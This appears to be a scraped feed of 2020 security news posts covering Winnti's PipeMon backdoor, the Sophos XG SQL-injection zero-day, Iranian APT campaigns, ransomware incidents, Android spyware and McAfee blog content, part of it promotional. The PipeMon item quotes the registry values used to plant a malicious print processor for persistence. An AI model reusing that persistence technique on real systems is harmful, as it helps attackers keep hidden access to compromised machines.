Below the Indicators of Compromise (IoCs) shared by Microsoft:

Below a list or recommendations to avoid this threat:

  • Keep your anti-virus software up to date.
  • Search for existing signs of the threat using IoCs in your environment.
  • Keep applications and operating systems running and up to date.
  • Be vigilant with attachments and links in emails.

Pierluigi Paganini

(SecurityAffairs – COVID-19, hacking)

The post Microsoft warns of “massive campaign” using COVID-19 themed emails appeared first on Security Affairs.

Winnti uses a new PipeMon backdoor in attacks aimed at the gaming industry

The Winnti hacking group continues to target gaming industry, recently it used a new malware named PipeMon and a new method to achieve persistence.

Winnti hacking group is using a new malware dubbed PipeMon and a novel method to achieve persistence in attacks aimed at video game companies.

The Winnti group was first spotted by Kaspersky in 2013, but according to the researchers the gang has been active since 2007.

The experts believe that under the Winnti umbrella there are several APT groups, including  Winnti, Gref, PlayfullDragon, APT17, DeputyDog, Axiom, BARIUM, LEADPassCV, Wicked Panda, Group 72, Blackfly, and APT41, and ShadowPad.

The APT group targeted organizations in various industries, including the aviation, gaming, pharmaceuticals, technology, telecoms, and software development industries.

PipeMon is a modular backdoor that was spotted by ESET researchers earlier this year on servers belonging to several developers of massively multiplayer online (MMO) games from South Korea and Taiwan. Each component of the backdoor is implemented by a DLL.

“In February 2020, we discovered a new, modular backdoor, which we named PipeMon. Persisting as a Print Processor, it was used by the Winnti Group against several video gaming companies that are based in South Korea and Taiwan and develop MMO (Massively Multiplayer Online) games.” reads the report published by the company. “Video games developed by these companies are available on popular gaming platforms and have thousands of simultaneous players.”

winnti backdoor gaming

In one case analyzed by the researchers, the hackers compromised a victim’s build system, then they have planted malware inside the video game executable. In another case, the Winnti group compromised the game servers were compromised, which could have allowed the attackers to conduct several malicious actions, including the manipulation of in-game currencies for financial gain.

Experts noticed that the PipeMon backdoor was signed with a certificate belonging to a video game company that was already hacked by Winnti in 2018.

Researchers also reported that the threat actors reused some C2 domains involved in other campaigns and used a custom login stealer that was previously associated with Winnti operations.

The experts discovered two PipeMon variants, but they were able to describe the infection process and how it has achieved persistence only for one of them.

The first stage of the PipeMon backdoor consists of a password-protected RARSFX executable embedded in the .rsrc section of its launcher.

The hackers achieved persistence by using the Windows print processors (DLLs). A malicious DLL‌ loader drops where the print processors reside and registered as an alternative print processor by modifying one of the two registry values:

HKLM\SYSTEM\ControlSet001\Control\Print\Environments\Windows x64\Print Processors\PrintFiiterPipelineSvc\Driver = “DEment.dll”
HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\lltdsvc1\Driver = “EntAppsvc.dll”

After having registered the Print Processor, PipeMon restarts the print spooler service (spoolsv.exe) to load the malware.

Since the service starts every time the computer reboot, the attackers have achieved persistence.

“After having registered the Print Processor, PipeMon restarts the print spooler service (spoolsv.exe). As a result, the malicious print process is loaded when the spooler service starts. Note that the Print Spooler service starts at each PC startup, which ensures persistence across system resets.” continues the report.

“This technique is really similar to the Print Monitor persistence technique (being used by DePriMon, for example) and, to our knowledge, has not been documented previously.”

PipeMon modules are DLLs exporting a function called IntelLoader and are loaded using a reflective loading technique.

The loader, responsible for loading the main modules (ManagerMain and GuardClient) is Win32CmdDll.dll and is stored in the Print Processors directory. Experts noticed that modules are stored encrypted on disk at the same location with inoffensive-looking names.

Experts also spotted an updated version of PipeMon for which they were able to retrieve the first stage. Its architecture is highly similar to the original variant, but its code was rewritten from scratch.

“Once again, the Winnti Group has targeted video game developers in Asia with a new modular backdoor signed with a code-signing certificate likely stolen during a previous campaign and sharing some similarities with the PortReuse backdoor. This new implant shows that the Winnti Group is still actively developing new tools using multiple open source projects; they don’t rely solely on their flagship backdoors, ShadowPad and the Winnti malware.” concludes ESET.

Pierluigi Paganini

(SecurityAffairs – Winnti, hacking)

The post Winnti uses a new PipeMon backdoor in attacks aimed at the gaming industry appeared first on Security Affairs.

Sophos blocked attacks exploiting XG Firewall zero-day to deploy Ransomware

Hackers attempted to exploit a zero-day flaw in the Sophos XG firewall to distribute ransomware to Windows machines, but the attack was blocked.

Threat actors attempted to exploit a zero-day (CVE-2020-12271) in the Sophos XG firewall to spread ransomware to Windows machines, the good news is that the attack was blocked by a hotfix issued by Sophos.

At the end of April, cybersecurity firm Sophos has released an emergency patch to address an SQL injection zero-day vulnerability affecting its XG Firewall product that has been exploited in the wild.

Sophos was informed of the attacks exploiting the zero-day issue by one of its customers on April 22. The customer noticed “a suspicious field value visible in the management interface.”

Sophos investigated the incident and determined that hackers were targeting systems configured with either the administration (HTTPS service) or the User Portal exposed on the WAN zone.

The attackers exploited an SQL injection zero-day vulnerability to gain access to exposed XG devices.

“The attack used a previously unknown SQL injection vulnerability to gain access to exposed XG devices.” reads the advisory published by Sophos.

“It was designed to download payloads intended to exfiltrate XG Firewall-resident data. The data for any specific firewall depends upon the specific configuration and may include usernames and hashed passwords for the local device admin(s), portal admins, and user accounts used for remote access.” “Passwords associated with external authentication systems such as AD or LDAP are unaffected. At this time, there is no indication that the attack accessed anything on the local networks behind any impacted XG Firewall.”

The hackers exploited the SQL injection flaw to download malicious code on the device that was designed to steal files from the XG Firewall.

Hackers exploited the issue to install the Asnarök Trojan that allowed the attackers to steal files from the XG Firewall and use the stolen info to compromise the network remotely.

The Trojan could be used to steal sensitive data including usernames and hashed passwords for the firewall device admin, and user accounts used for remote access. Login credentials associated with external authentication systems (i.e. AD, LDAP) are not impacted by the flaw.

According to a report published by Sophos at the end of April, the malware employed in the attack is able to retrieve firewall resident information, including:

  • The firewall’s license and serial number
  • A list of the email addresses of user accounts that were stored on the device, followed by the primary email belonging to the firewall’s administrator account
  • Firewall users’ names, usernames, the encrypted form of the passwords, and the salted SHA256 hash of the administrator account’s password. Passwords were not stored in plain text.
  • A list of the user IDs permitted to use the firewall for SSL VPN and accounts that were permitted to use a “clientless” VPN connection.

Below the attack scenario described by Sophos:

Sophos pushed a hotfix to the firewalls after the discovery of the attacks.

This hotfix eliminated the SQL injection vulnerability, stopped the XG Firewall from accessing any infrastructure under the control of the attacks, and cleaned up any remnants from the attack.

Sophos’s update also added a special box in the XG Firewall control panel to allow users to determine if their device has been compromised.

In the new wave of attacks, hackers exploited the issue to distribute the Ragnarok Ransomware.

“Since we published our first report, the attackers first modified their attack to attempt to use what we previously described as the “backup channel.” This was a Linux shell script that served as a dead man switch—a portion of the attack intended to trigger only under certain circumstances; in this case, if a specific file the attackers created during the attack gets deleted.” continues the report.

To deploy the Ragnarok ransomware, attackers attempted to leverage the EternalBlue and DoublePulsar exploits.

“Ragnarok is a less common threat than other ransomware, and it appears that this threat actor’s modus operandi – and the tooling they employ to deliver this ransomware—is quite different from those of many other threat actors. It was a rare and notable event to observe a Linux ELF application being used to try to spread malware across platforms to Windows computers.” concludes the report.

“This incident highlights the necessity of keeping machines inside the firewall perimeter up to date, and serves as a reminder that any IOT device could be abused as a foothold to reach Windows machines.”

Pierluigi Paganini

(SecurityAffairs – Sophos XG firewall, hacking)

The post Sophos blocked attacks exploiting XG Firewall zero-day to deploy Ransomware appeared first on Security Affairs.

Iran-linked Chafer APT group targets governments in Kuwait and Saudi Arabia

Cybersecurity researchers uncovered an Iranian cyber espionage campaign conducted by Chafer APT and aimed at critical infrastructures in Kuwait and Saudi Arabia.

Cybersecurity researchers from Bitdefender published a detailed report on an Iranian cyber espionage campaign directed against critical infrastructures in Kuwait and Saudi Arabia.

The cyber espionage campaigns were carried out by Iran-linked Chafer APT (also known as APT39 or Remix Kitten).

The Chafer APT group has distributed data stealer malware since at least mid-2014, it was focused on surveillance operations and the tracking of individuals.

The APT group targets telecommunication and travel industries in the Middle East to gather intelligence on Iran’s geopolitical interests.

“Victims of the analyzed campaigns fit into the pattern preferred by this actor, such as air transport and government sectors in the Middle East,” reads the researcher paper published by the experts.

“Some traces indicate that the goal of the attack was data exploration and exfiltration (on some of the victim’s tools such as Navicat, Winscp, found in an unusual location, namely “%WINDOWS%\ime\en-us-ime”, or
SmartFtpPasswordDecryptor were present on their systems).”

The attackers used several tools, including ‘living off the land’ tools, making it hard to attribute the attack to specific threat actors, as well as a custom-built backdoor.

The attacks against entities in Kuwait and Saudi Arabia have multiple similarities and shares some common stages, but experts noticed that the attacks seem more focused and sophisticated on victims from Kuwait.

Chafer APT launched spear-phishing attacks, the messages were used to deliver multiple backdoors that allowed them to gain a foothold, elevate their privileges, conduct internal reconnaissance, and establish persistence in the victim environment.

“Once the victims were compromised, attackers started to bring reconnaissance tools for network scanning (“xnet.exe”, “shareo.exe”) and credential gathering (as “mnl.exe” or “mimi32.exe”) or tools with multiple functionalities, such as CrackMapExec (for users’ enumeration, share listing, credentials harvesting and so on).” continues the report.

“During our investigation, on some of the compromised stations we observed some unusual behavior performed under a certain user account, leading us to believe the attackers managed to create a user account on the victims’ machine and performed several malicious actions inside the network, using that account.”

The attacks against entities in Kuwait appeared more sophisticated, attackers were creating a user account on the compromised machines and performed malicious actions inside the network, including credential harvesting with Mimikatz and lateral movements using multiple hacking tools from their arsenal.

Most of the hacking activity occurs on Friday and Saturday, coinciding with the weekend in the Middle East.

The campaign against a Saudi Arabian entity was characterized by the large use of social engineering attacks to trick the victim into executing a remote administration tool (RAT), The RAT employed in the attacks shares similarities with those used against Kuwait and Turkey.

“The case investigated in Saudi Arabia was not as elaborate, either because the attackers did not manage to further exploit the victim, or because the reconnaissance revealed no information of interest.” continues the report.

“While this attack was not as extensive as the one in Kuwait, some forensic evidence suggests that the same attackers might have orchestrated it. Despite the evidence for network discovery, we were not able to find any traces for lateral movement, most probably because threat actors were not able to find any vulnerable machines.”

The campaigns against Kuwait and Saudi Arabia demonstrate the intense cyberespionage activity carried out by Iran-linked APT groups in the Middle East. Anyway we cannot underestimate that these hacking groups are extending their range of action targeting government and organizations worldwide.

Pierluigi Paganini

(SecurityAffairs – Chafer APT, hacking)

The post Iran-linked Chafer APT group targets governments in Kuwait and Saudi Arabia appeared first on Security Affairs.

Australian product steel producer BlueScope hit by cyberattack

The Australian flat product steel producer BlueScope Steel Limited was hit by a cyberattack that caused disruptions to some of its operations.

Australian steel producer BlueScope was recently hit by a cyberattack that disrupted some of its operations.

The incident was spotted on Friday at one of its businesses located in the US, but the company did not share any detail about the attack.

“BlueScope today confirmed that its IT systems have been affected by a cyber incident, causing disruptions to parts of the Company’s operations. Our North Star, Asian and New Zealand businesses are continuing largely unaffected with minor disruptions.” reads the statement published by the company. “In Australia, manufacturing and sales operations have been impacted; some processes have been paused, whilst other processes including steel despatches continue with some manual processes and workarounds.”

The problems faced by the company are usually the result of a ransomware attack, the suspect is confirmed by iTnews that said the incident was caused by this family of malware and that is restoring systems from backups.

“BlueScope Steel is suffering IT “disruption” that is believed to be the result of a ransomware infection, impacting production systems used by its global operations.” reads a post published by iTnews. “iTnews has learned that production systems were halted company-wide in the early hours of Thursday morning, though recovery from backup was understood to be progressing on Thursday afternoon.”

BlueScope confirmed that the security incident impacted some of its IT systems. Manufacturing and sales operations in Australia were deeply impacted.

“In the affected areas the Company has reverted to manual operations where possible while it fully assesses the impact and remediates as required, in order to return to normal operations as quickly as possible.” continues the post.

Recently another Australian giant was hit by ransomware, the transportation and logistics giant Toll disclosed a security incident.

In May, Toll Group informed its customers that it has shut down some IT systems after a new ransomware attack, it is the second infection disclosed by the company this year.

Toll staff discovered the infection after noticing unusual activity on some servers, further investigation revealed the presence of the Nefilim ransomware.

Pierluigi Paganini

(SecurityAffairs – BlueScope, hacking)

The post Australian product steel producer BlueScope hit by cyberattack appeared first on Security Affairs.

Hackers Target Oil Producers During COVID-19 Slump

Recent research shows that the oil industry — already experiencing difficulties due to COVID-19 — must remain abreast of threats to stay safe from hackers.

Spear-phishing is a rapidly emerging threat. It’s more specific than generic phishing attempts and often targets a single person or company. Recent research shows that the oil industry — already experiencing difficulties due to COVID-19 — must remain abreast of threats to stay safe from hackers. 

Cybercriminals Capitalizing on the Chaos

The coronavirus is forcing companies in most industries to operate substantially differently. Many may find it takes time to adjust to the changes. Others do not immediately have the resources for a major shift, such as having all employees work remotely. 

A related concern is that COVID-19 is both a new and anxiety-inducing issue. People want to learn as much as they can about it, and their haste may result in them clicking on links without thinking. Cybercriminals view these conditions as ideal for orchestrating their attacks. Data from Barracuda cybersecurity researchers identified a 667% increase in spear-phishing attacks between the end of February and the following month. 

Real-Life Examples of Spear-Phishing Attacks in the Energy Production Sector

The threat of spear-phishing for energy companies is, unfortunately, not a theoretical one. Coverage published in late April by Bitdefender illuminated a carefully executed attack. The research team found evidence of a campaign occurring March 31, whereby hackers impersonated a well-known engineering company with experience in on- and off-shore energy projects. 

The messages — which did not include many of the telltale signs of phishing like spelling and grammatical errors — asked recipients to submit equipment and materials bids for the Rosetta Sharing Facilities Project. Participants would do so on behalf of Burullus, a gas joint venture partially owned by another Egyptian state oil brand. 

The emails also contained two attachments, which were supposedly bid-related forms. Downloading them infected a user’s system with a type of trojan spyware not previously seen in other utilities industry cyberattacks. The effort targeted oil companies all over the world, from Malaysia to South Africa, in a single day. 

Bitdefender’s research team also uncovered a more geographically specific spear-phishing attempt to target the gas sector on April 12. It centered on a relatively small number of shipping companies based in the Philippines. The emails asked them to send details associated with an oil tanker vessel and contained industry-specific language. This spear-phishing campaign occurred over two days. 

The cybersecurity experts that studied these attacks stressed that, since the messages contained accurate details about real-life companies and events associated with the oil industry, the attackers took the time to research to craft maximally convincing content. 

Hackers Love Causing Severe Disruptions

Why are cyberattacks in the energy industry suddenly on the rise? One reason may stem from the way hackers often deploy tactics to cause tremendous harm to necessary services. The oil industry operates on a vast scale. For example, a company specializing in oil and gas exploration planned as much as 300,000 feet of total footage for drilling in one region during 2018. 

The ability to get such impressive outcomes undoubtedly helps oil companies. The increased scale also may make it more necessary to safeguard against cyberattacks, especially as criminals look for ways to cause the most damage. Another recent incident, announced in a United States government alert on February 18, shut down a natural gas compression facility. Operations stopped for two days, causing losses in productivity and revenue. 

Although the publication did not name the energy company, it mentioned that the hackers depended on spear-phishing to get the credentials necessary for entering the businesses’ information technology (IT) network. It then used that access to wreak havoc on the enterprise’s operational technology infrastructure. 

Not a New Concern

Utilities industry cyberattacks have long worried cybersecurity analysts. If concentrated efforts from hackers shut down the electric grid, the effects could be long-lasting and hit virtually every industry and consumer in the affected areas. The risks to the energy sector began before the coronavirus pandemic, too. 

In November 2019, cybersecurity publications discussed a ransomware attack on Petróleos Mexicanos, Mexico’s largest oil and gas company. The perpetrators asked for 562 bitcoins to restore the data. The affected enterprise did not comply, and it had important data backed up. 

Toll Group, an Australian transportation and logistics company with oil and gas companies as clients, suffered a ransomware attack this spring. It was the second such issue in four months, with the first happening in February. 

The Energy Industry Must Remain Vigilant

The challenges posed by COVID-19 and its effect on oil prices may make the respective parties feel the impacts of cyberattacks in the energy industry more acutely. An ideal aim is to prevent those events rather than dealing with the damage afterward. Paying attention to cybersecurity vulnerabilities can help companies make meaningful gains and stay protected.

About the author

Kayla Matthews is a technology and cybersecurity writer, and the owner of To learn more about Kayla and her recent projects, visit her About Me page.

Pierluigi Paganini

(SecurityAffairs – COVID-19, hacking)

The post Hackers Target Oil Producers During COVID-19 Slump appeared first on Security Affairs.

Both Mirai and Hoaxcalls IoT botnets target Symantec Web Gateways

Experts from Palo Alto Networks discovered that the Mirai and Hoaxcalls botnets are targeting a vulnerability in legacy Symantec Web Gateways.

Palo Alto Networks Unit 42 researchers observed both the Mirai and Hoaxcalls botnets using an exploit for a post-authentication Remote Code Execution vulnerability in legacy Symantec Web Gateways

“I recently came across new Hoaxcalls and Mirai botnet campaigns targeting a post-authentication Remote Code Execution vulnerability in Symantec Secure Web Gateway, which is a product that became end-of-life (EOL) in 2015 and end-of-support-life (EOSL) in 2019.” reads the analysis published by Palo Alto Networks. “There is no evidence to support any other firmware versions are vulnerable at this point in time and these findings have been shared with Symantec.”

Symantec pointed out that the flaw has been fixed in Symantec Web Gateway 5.2.8 and that it doesn’t affect Secure Web Gateway solutions, such as ProxySG and Web Security Services.

Experts first observed the exploitation of the flaw in the wild on April 24, 2020, as part of an evolution of the Hoaxcalls botnet that was first discovered early of April. The botnet borrows the code from Tsunami and Gafgyt botnets, it expanded the list of targeted devices and added new distributed denial of service (DDoS) capabilities.

Operators behind the Hoaxcalls botnet started using the exploit a few days after the publication of the vulnerability details.

Hoaxcalls update-URL

In the first week of May, the experts also spotted a Mirai variant using the same exploit, but this samples don’t contain any DDoS capabilities.

“they serve the purpose of propagation using credential brute force and exploitation of the Symantec Secure Web Gateway RCE vulnerability This blog post provides any noteworthy technical details on these two campaigns.” continues the report.

According to Unit 42, both the Mirai and Hoaxcalls botnets used payloads designed to discover and infect vulnerable devices. In the case of Mirai, the bot is able to propagate via either credential brute-forcing or exploitation of the Symantec Web Gateways exploit.

Experts note that the exploit is only effective for authenticated sessions and the affected devices are End of Life (EOL) from 2012.

“In the case of both campaigns, one can assume that their success with this exploit is limited by the post-authentication nature of the Symantec Secure Web Gateway RCE vulnerability.” concludes Palo Alto Networks.

The report published by Palo Alto Networks contains technical details about the botnet, including the Indicators of Compromise (IoCs)

Pierluigi Paganini

(SecurityAffairs – Symantec Web Gateways, hacking)

The post Both Mirai and Hoaxcalls IoT botnets target Symantec Web Gateways appeared first on Security Affairs.

How to Stay Protected From Malware While Online at Home

Our everyday lives are not what they used to be three months ago. Many users have made the transition from working in an office to working from home and students have adopted distance learningBut while the world focuses on one virus sweeping the globe, criminals see an opportunity to spread other types of viruses across our networks and devices.  

As users adapt to their increased time spent at home and onlinehackers are taking advantage by spreading malware and other scams. Let’s break down some of the major malware scams affecting users today, as well as how they can stay secure.   

Remote Workers Targeted Through RDP Ports

With recent events accelerating the WFH trend, many companies have restricted employee travel and allocated more resources to enable virtual work. According to McAfee security researcher Thomas Roccia, a key component of enabling remote work and allowing employees to access internal corporate resources remotely is Remote Desktop Protocol (RDP). RDP is a Microsoft protocol that allows communication with a remote system. At a time where connectivity is more important now than ever before, it’s critical for users to be able to easily access the same tools and apps that they would in their office from their newfound remote work environmentsHowever, it’s likely that many organizations brought systems online quickly with minimal security checks in place, giving attackers the opportunity to infiltrate them with ease. Because RDP ports are often exposed to the internet,  an attacker could gain access to an entire network and consequentially, access a remote employee’s systemWhat’s more, these networks can be used as entry points for spreading malware or other malicious activities.  

Since March 2020, the McAfee Advanced Threat Research team has seen a significant increase in the number of exposed RDP ports. But what does that mean for users working remotelyBecause exposed RDP ports grant criminals access to remote systems, they are able to implement a number of malicious threats that could not only impact users working from home but also the organizations they work for. These threats include spreading spam and malware, as well as using the compromised RDP port to disguise malicious activity and compile their tools on the machine.  

Phishing Emails Spreading Malware and Ransomware

Recently, hackers have also leveraged phishing emails regarding today’s current events to lure people into engaging with malicious content and enabling threats to gain access to their systemsOnce established, that foothold can allow hackers to leverage malware to steal usernames and passwords, data, monitor user activity, capture user keystrokes, track network traffic and browser activity, and infiltrate networks and cloud services beyond the home. Criminals can also impersonate their victim to send emails from the infected devices to propagate themselves on numerous other systems. What’s more, hackers could spread ransomware that encrypts system files and refuse to decrypt them until the victim sends a ransom payment.  

Stay Secure in the New Digital Landscape

Hackers will always seek to capitalize on current events in order to spread cyber misfortune. The recent surge of remote employees and users taking to the internet in order to pass the time is no exception.  However, there are several steps users can take to facilitate a safe online environment for themselves and their families. Here’s what you can do to stay protected from malware regarding the current health emergency and similar threats: 

Secure your RDP protocol

Because RDP remains one of the most used vectors to breach into organizations and personal networksit’s important to follow best security practices. This includes using strong passwords and multi-factor authentication, patching vulnerabilities immediately, and not allowing RDP connections over the open internet. Discover more best practices on how to secure your RDP protocol in our blog on RDP security 

Beware of messages from unknown users

If you receive a text, email, social media message, or phone call from an unknown user regarding the current health emergency, it’s best to proceed with caution and avoid interacting with the message altogether.   

Go directly to the source

If you receive information from an unknown user, go directly to the source instead of clicking on links within messages or attachments. Using a tool like McAfee WebAdvisor can help users stay safe from malware and other threats while searching the web.   

Stay Updated

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook. 

The post How to Stay Protected From Malware While Online at Home appeared first on McAfee Blogs.

Texas Department of Transportation (TxDOT) hit by a ransomware attack

A new ransomware attack hit the Texas government, the malware this time infected systems at the state’s Department of Transportation (TxDOT).

The Texas government suffered two ransomware attacks in a few weeks, the first one took place on May 8, 2020 and infected systems at the Texas court.

Now ransomware has infected malware the systems at the state’s Department of Transportation (TxDOT), that attack forced the administrators to shut down the systems to avoid the propagation of the ransomware.

The state’s Department of Transportation (TxDOT) discovered the second attack on May 14, the infection follows an unauthorized access to the Department’s network.

“The Texas Department of Transportation determined that on May 14, 2020, there was unauthorized access to the agency’s network in a ransomware event” states the TxDOT.

The agency immediately took steps to prevent further damages and isolated impacted systems, it “working to ensure critical operations continue during this interruption.”

The agency reported the incident to local authorities and is investigating into the incident with the help of the FBI.

At the time of writing it is not clear if the two attacks are connected, there are no technical details about both incidents either if the attackers have stolen any data.

In August 2019, Texas was hit by a wave of ransomware attacks that are targeting local governments.

At least 23 local government organizations were impacted by the ransomware attacks, the Department of Information Resources (DIR) is currently investigating them and providing supports to mitigate the attacks.

Pierluigi Paganini

(SecurityAffairs – TxDOT, hacking)

The post Texas Department of Transportation (TxDOT) hit by a ransomware attack appeared first on Security Affairs.

Good Malware Protection Doesn’t Need to Slow You Down!

Good malware protection doesn’t need to slow you down!

“Security software slows down my PC.” This is a comment that is often heard when talking about malware protection on computers and laptops. While this may be true for many security products, even including the security software that is built into the Windows operating system, this is not the case with McAfee security. As a matter of fact, independent tests since 2016 have proven that McAfee is not only good at catching malware, it’s also one of the lightest security products available today.

What is malware protection?

Security software continuously keeps an eye on all the data that comes in and goes out of your PC. It does this in order to verify that there are no security threats to your personal data, privacy and identity while you are, for example, shopping online, checking your social media or working remotely.

Because security software is always active and protecting in the background many users have the idea that malware protection necessarily slows down the performance of their PCs. This idea however is likely based on experiences from long ago as certain security products did indeed have serious impacts on the user experience.

Measuring PC Performance

To measure how much impact malware protection nowadays has on PC performance, some independent test labs include performance impact benchmarks in their security product tests. The most well-known of these test labs are AV-TEST, which is based in Germany, and Austria based AV-Comparatives. These independent labs are among the most reputable and well-known anti-malware test labs in the world.

In their tests both labs look at ~20 security brands, including McAfee, and the test results show that McAfee Total Protection is one of the lightest security products available today.

Let’s have a closer look at what AV-TEST and AV-Comparatives have to say.


Every two months AV-TEST publishes the results of its on-going tests of 20 security products. As part of these tests the lab continuously evaluates the latest versions of all products using their default settings and measures the average impact of the product on computer speed in daily use.

A security product can achieve a maximum of 6 points depending on the test results. McAfee has consistently received the highest score in all performance tests since May 2018:

AV-Test PC Performance

Because of these excellent test results McAfee Total Protection was awarded the ‘2019 Performance Award’ by AV-TEST in March 2020.

Best Performance 2019AV-TEST Award

Below is what AV-TEST states about the award and about McAfee Total Protection:

Only products that make a high-performance finish in the AV-TEST labs throughout the test period of an entire year can claim this proof of absolute peak performance. With the AV-TEST Awards, a security product proves not only its technical superiority. Above all, it proves that it is documented as being the best the market currently has to offer in the fight against cyber-attacks.

With ‘Total Protection’, McAfee succeeded at fielding a top product in 2019 which was able to meet the high standards of the AV-TEST Institute. In the consumer field, McAfee receives recognition for best performance and is thus given the Best Performance 2019 Award by the AV-TEST Institute. 

With ‘Total Protection’, McAfee proves that good malware defense does not have to sacrifice system performance, says Andreas Marx, CEO of AV-TEST. Hardly any other software was able to achieve such stellar results in the category of performance in the annual test. Which is why McAfee receives the Performance Award for consumer software.

The announcement of the award can be seen on the AV-TEST website here.


Every year in April and October AV-Comparatives publishes their Performance Test Report. For this report the lab looks at 17 security products including McAfee Total Protection and evaluates how much impact these have on PC performance.

The test lab uses low-end computers as these are most widely used and more at risk of suffering from resource consumption and thus performance impact. The tests also mimic daily usage as much as possible and focus on activities such as copying files, installing and uninstalling applications, launching applications, downloading files and browsing websites.

Based on the results on these tests the products are then evaluated and graded in award levels ranging from ADVANCED+ (the highest ranking) to STANDARD (the lowest ranking).

McAfee has achieved the ADVANCED+ ranking continuously since October 2016:

AV-Comparatives Performance Impact Scores

As a result, McAfee received the Silver Award in the category ‘Overall Performance (Low System-Impact)’ in February 2020 for demonstrating a lower impact on system performance than other products throughout 2019.

And in 2020 we are off to a good start again!

On May 8th AV-Comparatives published April 2020 Performance Test Report and McAfee Total Protection is again awarded with the highest possible rating: ADVANCED+.

With this result McAfee continues to show less impact on PC Performance than most other security products and is one of the lightest security products on the market: 


McAfee continues to show less impact on PC Performance than most other security products. Summary

Even though good malware protection is continuously monitoring all activity on your PC and laptop for cyber threats, this doesn’t have to mean that it also slows down the performance of your devices.

As we have seen in the test results of two of the world’s most reputable anti-malware test labs AV-TEST and AV-Comparatives, McAfee Total Protection has been achieving stellar test results in performance tests since October 2016 which also resulted in McAfee being awarded by both test labs with performance awards in 2019.

And with an excellent start in the 2020 test reports we believe that it is fair to say that good malware protection doesn’t need to slow you down and McAfee Total Protection is one of the lightest security products currently available.



The post Good Malware Protection Doesn’t Need to Slow You Down! appeared first on McAfee Blogs.

Mandrake, a high sophisticated Android spyware used in targeted attacks

Security experts discovered a highly sophisticated Android spyware platform, dubbed Mandrake, that remained undetected for four years.

Researchers from Bitdefender discovered a high-sophisticated Android spyware platform dubbed Mandrake, it was involved in highly targeted attacks against specific devices. Mandrake is an advanced cyberespionage platform, but experts believe the attacks are financially motivated.

Threat actors behind this campaign managed to fly under the radar for as long as possible. Attackers carefully selected the devices to infect and avoid compromise devices in countries that are of interest to them.

“Mandrake stood in the shadow for at least 4 years. During this time, it stole data from at least tens of thousands of users.” reads the report published by Bitdefender. “It takes special care not to infect everyone” – This is exactly what the actor did and most likely why it remained under the radar for 4 full years. Because of this strategy, the actual number of infections we were able to trace is quite low; Google Play Apps used as droppers to infect targets have only hundreds or – in some cases – thousands of downloads. It might even be possible that some of the infected users won’t face an attack at all if they present no interest to the actor.”

Most of the infections are in Australia, followed in Europe, America, and Canada. Experts observed two different waves of attacks, a first one in 2016 and 2017.

Experts detected seven malicious applications delivering Mandrake in Google Play alone, namely Abfix, CoinCast, SnapTune Vid, Currency XE Converter, Office Scanner, Horoskope, and Car News.


Sinkholing performed by the experts revealed about 1,000 victims during a 3-week period. The researchers estimated that the tens of thousands, and probably hundreds of thousands, were infected in the last 4 years.

During the past four years, the platform has received numerous updates, operators constantly implemented new features.

Mandrake allows attackers to gain complete control over an infected device and exfiltrate sensitive data, it also implements a kill-switch feature (a special command called seppuku (Japanese form of ritual suicide)) that wipes all victims’ data and leave no trace of malware.

“The attacker has access to data such as device preferences, address book and messages, screen recording, device usage and inactivity times, and can
obviously paint a pretty accurate picture of the victim, and their whereabouts.” continues the report. “The malware has complete control of the device: it can turn down the volume of the phone and block calls or messages, steal credentials, exfiltrate information, to money transfers and blackmailing. It can conduct phishing attacks, by loading a webpage and injecting a specially crafted JavaScript code to retrieve all data from input forms.”

The list of targets is long and includes an Australian investment trading app, crypto-wallet apps, the Amazon shopping application, Gmail, banking software, payment apps, and an Australian pension fund app.

The malware avoids the detection delaying the activities and working in three stages: dropper, loader, and core.

The dropper is represented by the apps published in Google Play, while it is not possible to determine when the loader and the core are delivered.

The malware implements evasion techniques such as anti-emulation and leverages administrator privileges and the Accessibility Service to achieve persistence.

The report contains technical details about the threat, including Indicators of Compromise.

Pierluigi Paganini

(SecurityAffairs – Mandrake, hacking)

The post Mandrake, a high sophisticated Android spyware used in targeted attacks appeared first on Security Affairs.

Ramsey Malware

A new malware, called Ramsey, can jump air gaps:

ESET said they've been able to track down three different versions of the Ramsay malware, one compiled in September 2019 (Ramsay v1), and two others in early and late March 2020 (Ramsay v2.a and v2.b).

Each version was different and infected victims through different methods, but at its core, the malware's primary role was to scan an infected computer, and gather Word, PDF, and ZIP documents in a hidden storage folder, ready to be exfiltrated at a later date.

Other versions also included a spreader module that appended copies of the Ramsay malware to all PE (portable executable) files found on removable drives and network shares. This is believed to be the mechanism the malware was employing to jump the air gap and reach isolated networks, as users would most likely moved the infected executables between the company's different network layers, and eventually end up on an isolated system.

ESET says that during its research, it was not able to positively identify Ramsay's exfiltration module, or determine how the Ramsay operators retrieved data from air-gapped systems.

Honestly, I can't think of any threat actor that wants this kind of feature other than governments:

The researcher has not made a formal attribution as who might be behind Ramsay. However, Sanmillan said that the malware contained a large number of shared artifacts with Retro, a malware strain previously developed by DarkHotel, a hacker group that many believe to operate in the interests of the South Korean government.

Seems likely.


FBI warns US organizations of ProLock ransomware decryptor not working

The FBI‌ issued a flash alert to warn organizations in the United States that the ProLock ransomware decryptor doesn’t work properly.

Early this month, the FBI‌ issued a flash alert to warn organizations of the new threat actor targeting healthcare, government, financial, and retail industries in the US.

“The decryption key or ‘decryptor’ provided by the attackers upon paying the ransom has not routinely executed correctly,” states the alert.

“The decryptor can potentially corrupt files that are larger than 64MB and may result in file integrity loss of approximately 1 byte per 1KB over 100MB.”

Threat actors are attempting to take advantage of the ongoing Coronavirus pandemic and are using COVID-19 lures in their attacks.

Experts reported several ransomware attacks against businesses and organizations, the ProLock ransomware is just is yet another threat to the list.

The FBI is recommending victims of ransomware attacks to avoid paying the ransom to decrypt their files. Feds warned that the decryptor for the ProLock is not correctly working and using it could definitively destroy the data. The descriptor could corrupt files larger than 64MB during the decryption process.

The PwndLocker ransomware first appeared in the threat landscape by security researchers in late 2019, operators’ demands have ranged from $175,000 to more than $660,000 worth of Bitcoin.

According to the FBI, operators behind the threat gain access to hacked networks via the Qakbot (Qbot) trojan, but experts from Group-IB added that they also target unprotected Remote Desktop Protocol (RDP)-servers with weak credentials. It is still unclear if the ProLock ransomware was managed by the Qakbot gang, or if the ProLock operators pay to gain access to hosts infected with Qakbot to deliver their malware.

“ProLock operators used two main vectors of initial access: QakBot (Qbot) and unprotected Remote Desktop Protocol (RDP)-servers with weak credentials.” reads the report published by Group-IB.

